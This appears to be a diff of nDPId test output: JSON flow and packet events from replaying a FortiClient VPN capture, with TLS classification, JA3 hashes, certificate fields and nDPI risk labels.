-00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1621067209199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067209199,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF8KMsekCMzAAAAALAC\/\/8eiQAAAgQFtAEDAwUBAQgKJ6dSCQAAAAAEAgAA"} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1621067209262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067209262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA81pJAADQGLXFSUS4NwKgBsijL8XxcuXqIHpAjNKASOECG6AAAAgQFrAQCCAoGP5LWJ6dSCQEDAwo="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1621067209262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067209262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF8KMsekCM0XLl6iYAQECzdhQAAAQEICienUkcGP5LW"} -01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067209199,"flow_last_seen":1621067209264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1621067209264,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01208{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067209199,"flow_last_seen":1621067209346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1753,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1621067209346,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01474{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067209199,"flow_last_seen":1621067209348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1621067209348,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} 
-00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1621067203571,"flow_last_seen":1621067204682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3422,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} -00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1621067204622,"flow_last_seen":1621067205708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6751,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} 
-00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1621067205651,"flow_last_seen":1621067206738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3853,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} -00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1621067206773,"flow_last_seen":1621067207860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7276,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} 
-00964{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1901,"flow_first_seen":1621067209199,"flow_last_seen":1621067222261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":277457,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067203571,"flow_last_seen":1621067203571,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067203571,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1621067203571,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067203571,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFtKMutlmzOAAAAALAC\/\/9bnAAAAgQFtAEDAwUBAQgKJ6c8YwAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1621067203633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067203633,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8pJBAADQGX3NSUS4NwKgBsijL8W1kEcpBrZZsz6ASOEBvHAAAAgQFrAQCCAoGP5CkJ6c8YwEDAwo="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1621067203633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067203633,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFtKMutlmzPZBHKQoAQECzFugAAAQEICienPKAGP5Ck"} 
+01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067203571,"flow_last_seen":1621067203776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1621067203776,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01129{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067203571,"flow_last_seen":1621067203852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1611,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1621067203852,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067203571,"flow_last_seen":1621067203854,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":374,"midstream":0,"thread_ts_msec":1621067203854,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067204622,"flow_last_seen":1621067204622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067204622,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1621067204622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067204622,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFuKMux1NwAAAAAALAC\/\/\/kHgAAAgQFtAEDAwUBAQgKJ6dAbwAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1621067204682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067204682,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8DZFAADQG9nJSUS4NwKgBsijL8W6yVLN5sdTcAaASOEC\/ugAAAgQFrAQCCAoGP5ENJ6dAbwEDAwo="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1621067204682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067204682,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFuKMux1NwBslSzeoAQECwWWwAAAQEICienQKoGP5EN"} +01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067204622,"flow_last_seen":1621067204827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067204827,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067204622,"flow_last_seen":1621067204898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067204898,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067204622,"flow_last_seen":1621067204900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067204900,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067205651,"flow_last_seen":1621067205651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067205651,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1621067205651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067205651,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFzKMsSeiBCAAAAALAC\/\/87PQAAAgQFtAEDAwUBAQgKJ6dEZQAAAAAEAgAA"} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1621067205710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067205710,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8c5FAADQGkHJSUS4NwKgBsijL8XP7CfxqEnogQ6ASOECEzAAAAgQFrAQCCAoGP5FzJ6dEZQEDAwo="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1621067205710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067205710,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFzKMsSeiBD+wn8a4AQECzbbQAAAQEICienRJ8GP5Fz"} +01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067205651,"flow_last_seen":1621067205856,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067205856,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067205651,"flow_last_seen":1621067205926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067205926,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067205651,"flow_last_seen":1621067205928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067205928,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
